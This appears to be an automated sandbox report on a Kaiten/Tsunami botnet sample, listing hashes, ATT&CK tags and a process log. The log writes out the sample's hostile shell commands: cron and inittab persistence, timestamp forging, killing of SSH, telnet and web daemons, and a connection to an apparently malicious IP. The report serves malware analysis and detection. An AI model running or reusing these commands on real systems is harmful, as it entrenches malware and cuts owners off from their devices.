Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-r46c9aydjc
Target 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
SHA256 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
Tags
kaiten botnet defense_evasion discovery execution persistence privilege_escalatio
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c

Threat Level: Known bad

The file 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c was found to be: Known bad.

Malicious Activity Summary

kaiten botnet defense_evasion discovery execution persistence privilege_escalatio

Detects Kaiten/Tsunami Payload

Kaiten family

Kaiten/Tsunami

Creates/modifies Cron job

Enumerates running processes

Indicator Removal: Timestomp

Enumerates kernel/hardware configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 14:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 14:45

Reported

2024-10-27 14:48

Platform

debian9-mipsel-20240611-en

Max time kernel

8s

Max time network

5s

Command Line

[/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.dfqTdg /usr/bin/crontab N/A

Enumerates running processes

Indicator Removal: Timestomp

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/touch N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/touch N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/772/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/692/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/699/stat /usr/bin/killall N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/745/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/660/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/790/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/115/cmdline /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/698/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/67/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/421/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/421/stat /usr/bin/killall N/A
File opened for reading /proc/769/stat /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/754/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/777/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/138/cmdline /usr/bin/killall N/A

Processes

/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c

[/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c (crontab -l | grep -v "/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x00740882966) > /dev/null 2>&1]

/bin/grep

[grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/grep

[grep -v no cron]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v lesshts/run.sh]

/bin/sh

[sh -c echo "* * * * * /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c > /dev/null 2>&1 &" >> /var/run/.x00740882966]

/bin/sh

[sh -c crontab /var/run/.x00740882966]

/usr/bin/crontab

[crontab /var/run/.x00740882966]

/bin/sh

[sh -c rm -rf /var/run/.x00740882966]

/bin/rm

[rm -rf /var/run/.x00740882966]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" > /etc/inittab2]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c service httpd stop > /dev/null 2>&1 &]

/bin/cat

[cat /var/run/httpd.pid]

/bin/sh

[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]

/usr/sbin/service

[service httpd stop]

/bin/sh

[sh -c killall -9 minihttpd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 mini_httpd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 minihttpd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]

/bin/cat

[cat /var/run/thttpd.pid]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c nvram set http_enable=0 > /dev/null 2>&1]

/bin/sh

[sh -c killall -9 httpd > /dev/null 2>&1 &]

/bin/sh

[sh -c service telnetd stop > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 httpd]

/bin/sh

[sh -c service sshd stop > /dev/null 2>&1 &]

/usr/sbin/service

[service telnetd stop]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sh

[sh -c killall -9 telnetd > /dev/null 2>&1 &]

/usr/sbin/service

[service sshd stop]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 utelnetd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 telnetd]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 dropbear > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 utelnetd]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop httpd.service]

/bin/sh

[sh -c killall -9 sshd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 dropbear]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 lighttpd > /dev/null 2>&1 &]

/usr/bin/killall

[killall -9 sshd]

/usr/bin/killall

[killall -9 lighttpd]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop telnetd.service]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop sshd.service]

Network

Country Destination Domain Proto
RU 195.133.232.91:8080 tcp

Files

memory/700-1-0x00400000-0x005777e8-memory.dmp

/run/.x00740882966

MD5 902500eb591448fdf0429190ca97b1b8
SHA1 abcab7548580c6edda59d47e7defc8f57c77bfc9
SHA256 f998d3658ddd489491adf1d1e4258a8e517fe0daf59c97d20ed289bb5694ee2e
SHA512 c6821fbaf2bc0cc1eec1dd46753c78aa410ec4b89be7d5001b6a9b904933e24dc84a3969615d981dfb15bd0cab38b2fd639dea2bea4264343a9bb551ad24b7c4

/var/spool/cron/crontabs/tmp.dfqTdg

MD5 afa442e0c7e7a7f4b351c19901209c21
SHA1 08be14f5db36070b7caad4b5d0b36578e6a07fbd
SHA256 9417bcd3aa8d95abeebbec85d036d5e3930d6d04e0067d0fc41a038f9203dc5f
SHA512 d319c83a08e4018d6637955a4c0e5565e84c13f7f8aff26620170e7938e7331a787bc23606c6f4031d13e53c6f0403fa74e19299e9984d704d344f1e5fc4017c

/etc/inittab2

MD5 b6789402fc08db781649a3fce1776ece
SHA1 df66ddabc65d910bb1617dfffcea6e01c651e478
SHA256 2dd5ebb0768ec6da19582bd64eebcd975d94125542d01a38c75f97b581dd4eaf
SHA512 799b8b08b044571f7659a3044bb3c09073bee717db6dd934f8fbfdf1e79f3babb0b8b0f22d6377e2ba8281eb3dcddc4ba705b8483c88388dc1d5f44fc78dd68d